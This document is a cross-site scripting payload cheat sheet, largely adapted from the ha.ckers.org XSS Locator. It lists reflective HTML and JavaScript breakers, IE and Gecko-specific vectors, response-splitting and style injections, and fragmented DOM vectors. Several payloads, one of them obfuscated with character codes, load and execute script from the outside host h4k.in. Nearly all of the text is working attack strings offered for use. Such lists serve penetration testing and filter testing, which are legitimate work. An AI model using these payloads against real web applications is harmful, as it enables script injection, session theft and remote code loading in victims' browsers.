--- Reflective XSS Attacks ---Advanced XSS Locator';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//This is a modified version of the XSS Locator from ha.ckers.orgAdvanced XSS Locator for <title>-Injections';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}This is a modified version of the XSS Locator from ha.ckers.orgHTML Breaking XSS 1 (all quotes)'';!--"<script>alert(0);</script>=&{(alert(1))}HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 2 (double quotes)"><script>alert(0);</script>HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 3 (single quotes)'><script>alert(0);</script>HTML Breaker - tries to break the attribute injected inHTML Breaking XSS 4 (attributes)'<script>alert(0);</script>HTML Breaker - credits go to AlexSemicolon XSS (HTML)<img src=x onerror=;;alert(1) />HTML Breaker - credits go to KishorTitle-breaker</title><script>alert(1)</script>HTML-breaking XSS for backticked attributes`> <script>alert(5)</script>Textarea-breaker (onmouseover)</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>Noscript-breaker (onmouseover)</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>Style-breaker}</style><script>a=eval;b=alert;a(b(/i/.source));</script> --- Reflective JS XSS ---JS Breaking XSS 1;}alert(0);{JS Breaker - tries to break the JavaScript injected inJS Breaking XSS 2 (string concatenation)"+alert(0)+"JS Breaker - tries to break the JavaScript injected inonerror XSS Injectionxyz onerror=alert(6); onclick XSS Injectiononclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);Plain JS XSS Injection 1a=eval;b=alert;a(b(8));Plain JS XSS Injection 2a=1;a=eval;b=alert;a(b(11));//String-breaking JS Injection (single 
quoted)';//%0da=eval;b=alert;a(b(9));//String-breaking JS Injection (double quoted)";//%0da=eval;b=alert;a(b(10));//JSON-breaking JS Injection (single quoted)'};a=eval;b=alert;a(b(13));//JSON-breaking JS Injection (double quoted)"};a=eval;b=alert;a(b(12));//JSON-breaking JS Injection (non-quoted)1};a=eval;b=alert;a(b(14));//Array-breaking JS Injection (single quoted)'];a=eval;b=alert;a(b(15));//Array-breaking JS Injection (double quoted)"];a=eval;b=alert;a(b(16));//Array-breaking JS Injection (non quoted)1];a=eval;b=alert;a(b(17));//Int-breaking JS Injection (non quoted)1;a=eval;b=alert;a(b(/c/.source));CRLF-forced JS Injection%0da=eval;b=alert;a(b(/d/.source));JS Comment breaker*/a=eval;b=alert;a(b(/e/.source));/* --- JS Includes --- (the following vectors fetch and execute script from the external host h4k.in; before using them in an engagement, replace that host with one you control, since whatever that domain serves will run in the target's origin)Tiny XSS Include 1 (20 characters, FFox only)<script src=//h4k.inSuper-tiny inclusion vector - 20 characters length.Tiny XSS Include 2 (27 characters - all browsers)<script src=http://h4k.in/>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.Tiny XSS Include 3 (30 characters - all browsers)<script src=//h4k.in></script>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.Tiny XSS Include 4 (HTML Breaking)"><script src=//h4k.in></script><Tiny inclusion vector for IE, FFox and Opera - breaks HTML. --- Fragmented DOM XSS ---Include Fragment Pt. 1<scriFirst part of a fragmented inclusion attack vector. Swallows the enclosed HTML.Include Fragment Pt. 2pt src=//h4k.in><Second part of a fragmented inclusion attack vector.Include Fragment Pt. 3></script>Third part of a fragmented inclusion attack vector. 
--- HTML Injection ---Advanced HTML Injection Locator<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s>HTML injection vector.HTML Injection 1 (http://h4k.in/i.js)"><script src=http://h4k.in/i.js></script>HTML injection vector.HTML Injection 2 (using JS - http://h4k.in/i.js)"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>HTML injection vector.HTML Injection 3 (using charcode - http://h4k.in/i.js)"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>HTML injection vector. --- Browser specific attacks ---IE VBScript injectionvbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))This works in IE only - use the PoC Link feature to test for this.IEIE expression injection" style="color: expression(alert(0));" a="This works in IE only - use the PoC Link feature to test for this.IEIE closing-tag expression injection</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">IEIE backticked semicolon injection<img src=`x` onrerror= ` ;; alert(1) ` />IEMozilla -moz-binding-url injection" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="This works in Gecko browsers only.GeckoMozilla -moz-binding-url injection (filter evading)" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="This works in Gecko browsers only. 
Was once used on php.netGecko --- Weird stuff ---HTTP Response Splitting XSS%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/HTTP response splitting vector with XSS alertNullbyte XSSc%00""<script>alert(0);</script> --- Style injections and hw/fw-encoding attacks ---BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}x=alert;x(%26%2340 /finally through!/.source %26%2341);x=alert;x(%26%2340 /finally through!/.source %26%2341);%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// --- URL injection ---http://aa<script>alert(123)</script>http://aa<script>alert(123)</script>